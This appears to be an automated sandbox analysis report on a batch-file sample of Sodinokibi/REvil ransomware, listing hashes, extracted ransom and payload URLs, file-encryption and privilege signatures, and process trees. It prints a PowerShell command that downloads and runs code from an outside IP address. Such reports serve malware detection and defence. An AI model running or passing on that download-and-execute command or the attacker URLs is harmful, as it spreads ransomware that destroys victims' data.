Analysis
- max time kernel: 61s
- max time network: 112s
- platform: windows10_x64
- resource: win10
- submitted: 23-08-2020 00:10
Static task: static1
Behavioral task: behavioral1
  Sample: 25670aeb8c557614c06e34c5a9c253e5.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 25670aeb8c557614c06e34c5a9c253e5.bat
  Resource: win10
General
- Target: 25670aeb8c557614c06e34c5a9c253e5.bat
- Size: 219B
- MD5: c052ffa560e4de5251e2ea89d88526b5
- SHA1: 5f0a6636545f8107c02801a0a190a1a8c274b190
- SHA256: 5949574200b2d571b720bac31031f7a5b01d4224da05e5cd5064156972eba462
- SHA512: f5f8fc051da52356820f62fd5088115bb5108d6cb37b2c13f0538816f84247f24d0188988407d8a9351ebd1ed5275a3c74daa49c6c6dcae02241b175a5a79f84
Malware Config
Extracted
- URL: http://185.103.242.78/pastes/25670aeb8c557614c06e34c5a9c253e5
Extracted
- Path: C:\429c34h-readme.txt
- Family: sodinokibi
- URL: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5EBEAD0EEC4F7ACC
- URL: http://decryptor.cc/5EBEAD0EEC4F7ACC
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow | pid  | process
  3    | 3160 | powershell.exe
- Modifies extensions of user files (7 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  description  | ioc                                                                                              | process
  File renamed | C:\Users\Admin\Pictures\ClearExit.raw => \??\c:\users\admin\pictures\ClearExit.raw.429c34h               | powershell.exe
  File renamed | C:\Users\Admin\Pictures\ConvertMove.png => \??\c:\users\admin\pictures\ConvertMove.png.429c34h           | powershell.exe
  File renamed | C:\Users\Admin\Pictures\DisconnectFormat.png => \??\c:\users\admin\pictures\DisconnectFormat.png.429c34h | powershell.exe
  File renamed | C:\Users\Admin\Pictures\ReceiveEnter.png => \??\c:\users\admin\pictures\ReceiveEnter.png.429c34h         | powershell.exe
  File renamed | C:\Users\Admin\Pictures\StepEnter.raw => \??\c:\users\admin\pictures\StepEnter.raw.429c34h               | powershell.exe
  File renamed | C:\Users\Admin\Pictures\SaveSend.raw => \??\c:\users\admin\pictures\SaveSend.raw.429c34h                 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\WaitRevoke.png => \??\c:\users\admin\pictures\WaitRevoke.png.429c34h             | powershell.exe
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
  description | ioc                                                                                                        | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                                        | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer                   | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                                   | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                                 | vssvc.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  description     | ioc                                                                                                                                                          | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\73z6480.bmp" | powershell.exe
- Drops file in Program Files directory (12 IoCs)
  Processes: powershell.exe
  description                  | ioc                                               | process
  File opened for modification | \??\c:\program files\ConvertSend.M2V              | powershell.exe
  File opened for modification | \??\c:\program files\ExitDebug.xps                | powershell.exe
  File opened for modification | \??\c:\program files\FindUnblock.tif              | powershell.exe
  File opened for modification | \??\c:\program files\OutTest.MTS                  | powershell.exe
  File opened for modification | \??\c:\program files\UninstallSplit.raw           | powershell.exe
  File opened for modification | \??\c:\program files\UnregisterGrant.rm           | powershell.exe
  File opened for modification | \??\c:\program files\UpdateRepair.inf             | powershell.exe
  File created                 | \??\c:\program files\429c34h-readme.txt           | powershell.exe
  File created                 | \??\c:\program files (x86)\429c34h-readme.txt     | powershell.exe
  File opened for modification | \??\c:\program files\LimitOptimize.wps            | powershell.exe
  File opened for modification | \??\c:\program files\ResizeReceive.wav            | powershell.exe
  File opened for modification | \??\c:\program files\StartAdd.vdw                 | powershell.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe
  pid  | process
  3160 | powershell.exe
  3160 | powershell.exe
  3160 | powershell.exe
  3160 | powershell.exe
  3160 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: powershell.exe, vssvc.exe
  description                      | pid  | process
  Token: SeDebugPrivilege          | 3160 | powershell.exe
  Token: SeDebugPrivilege          | 3160 | powershell.exe
  Token: SeTakeOwnershipPrivilege  | 3160 | powershell.exe
  Token: SeBackupPrivilege         | 3468 | vssvc.exe
  Token: SeRestorePrivilege        | 3468 | vssvc.exe
  Token: SeAuditPrivilege          | 3468 | vssvc.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: cmd.exe
  description                        | pid  | process | target process
  PID 3672 wrote to memory of 3160   | 3672 | cmd.exe | powershell.exe
  PID 3672 wrote to memory of 3160   | 3672 | cmd.exe | powershell.exe
  PID 3672 wrote to memory of 3160   | 3672 | cmd.exe | powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\25670aeb8c557614c06e34c5a9c253e5.bat"
  - Suspicious use of WriteProcessMemory
  PID: 3672
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/25670aeb8c557614c06e34c5a9c253e5');Invoke-AMKGYOMYBGBS;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3160
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  PID: 3468